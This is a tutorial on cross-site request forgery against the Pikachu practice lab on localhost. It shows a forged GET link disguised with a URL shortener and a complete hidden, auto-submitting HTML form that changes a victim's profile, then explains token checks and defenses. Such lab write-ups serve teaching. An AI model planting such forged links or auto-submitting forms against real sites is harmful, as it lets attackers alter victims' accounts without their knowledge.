Article directory
- 1. Cross-site request forgery (CSRF)
-
- 1.1 CSRF(get)
- 1.2 CSRF(post)
- 1.3 CSRF Token
- 1.4 CSRF vulnerability defense
1. Cross-site request forgery (CSRF)
You can also refer to my other article: Cross-site request forgery (CSRF)
The full name is Cross-site request forgery, which translates as cross-site request forgery. It refers to using the victim’s identity authentication information (cookies, sessions, etc.) that has not expired to trick them into clicking on malicious links or accessing pages containing attack code, without the victim’s knowledge. Under certain circumstances, a request is sent to the server (corresponding to the identity authentication information) as the victim to complete illegal operations (such as transfers, password changes, etc.). The biggest difference between CSRF and XSS is that CSRF does not steal cookies but uses them directly.
What is CSRF?
CSRF, cross-site domain request forgery, usually the attacker will forge a scene (such as a link) to induce the user to click. Once the user clicks, the hacker’s attack purpose is achieved. He can steal your identity and use your Send malicious requests on behalf of others. The key to a CSRF attack is to use the victim’s cookie to send forged requests to the server.
1.1 CSRF(get)
Here is a login interface, use the prompted username and password to log in
Found that it is a personal information page
Click to modify personal information and click Submit
So at this time, you can use burpsuit to capture and modify the packet. When you click Submit to modify personal information, you can capture the packet and see the following content.
As can be seen from the URL above, when modifying user information, there is no unpredictable authentication information. Then we can modify the parameters in the path.
For example, change the phone number to a new parameter.
127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=Female & amp;phonenum=150666666668 & amp;add=Beijing & amp;[email protected] & amp;submit=submit
But this path is too obvious, and we can use the short path method to forge our path.
https://s.r.sn.cn/vEARsG
If the attacker’s login status or cookie/session has not expired at this time, if the user logged in to Taobao and opened a new (hacker-designed link to modify Taobao login password) without exiting Taobao (or the identity authentication information has not expired) ), the Taobao password will be changed.
1.2 CSRF(post)
Log in to your Allen account to make changes.
Then use burpsuit to capture and modify the packet. When you click Submit to modify personal information, you can capture the packet and see the following content.
It is found that the method used to transmit data is POST submission. We also know the tags and names in this page, which can be used later when constructing the form.
An attacker can construct a malicious site, hide the POST request in a form on the site, and then trick the user into clicking. When the user clicks, the form is triggered, and the data is naturally POSTed to a website with CSRF vulnerabilities, and the user’s information is maliciously modified. .
<html>
<script> <!-- This script is used to automatically submit the form -->
window.onload = function() {<!-- -->
document.getElementById("submit").click();
}
</script>
<body>
<form action="http://127.0.0.1/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
<input type="hidden" name="sex" value="girl" />
<input type="hidden" name="phonenum" value="15088888888" />
<input type="hidden" name="add" value="Myanmar" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="submit" value="submit" />
<input id="submit" type="submit" value="Submit request" style="display:none"/> <!-- Set style to display:none to hide the submit button -->
</form>
</body>
</html>
Deploy the written form to the attacker’s site. Because this is a local demonstration, the location is in the WWW\pikachu\vur\scrf directory.
When a user visits the attacker’s site 127.0.0.1/pikachu/vul/csrf/CSRF.html and clicks the submit button, his or her personal information will be maliciously modified, which can be seen in the console after clicking the button. Triggered POST request.
before click
after click
1.3 CSRF Token
Principle of token verification
The main problem of CSRF is that links for sensitive operations are easily forged. Each request adds a random code (it needs to be random enough and not easy to forge), and the random code is verified every time in the background.
The web page accepts tokens sent from the background, and the type is invisible. Submit it to the backend for verification. Every time it is refreshed, the token sent from the background is different, which prevents forgery.
Use bp packet capture to check, you can see that the packet contains token
View the source code and when modifying user information, the server will compare the token field in the URL with the token field in the session. If they are the same, the user information can be modified. And after modifying the user information, the set_token() function will be used to generate a new token, which will be returned to the HTML form and hidden so that it can be entered into the URL the next time the user modifies the information.
The set_token() function will destroy the old token before generating a new token to avoid reuse of the token.
1.4 CSRF vulnerability defense
- Validate Referer field
- Add Token verification
- Two-step verification: Enter your password or verification code before key operations.
- HttpOnly: In some cases, JS scripts are prohibited from accessing cookie information.
- SameSite: Cookie attribute, the browser’s own security mechanism.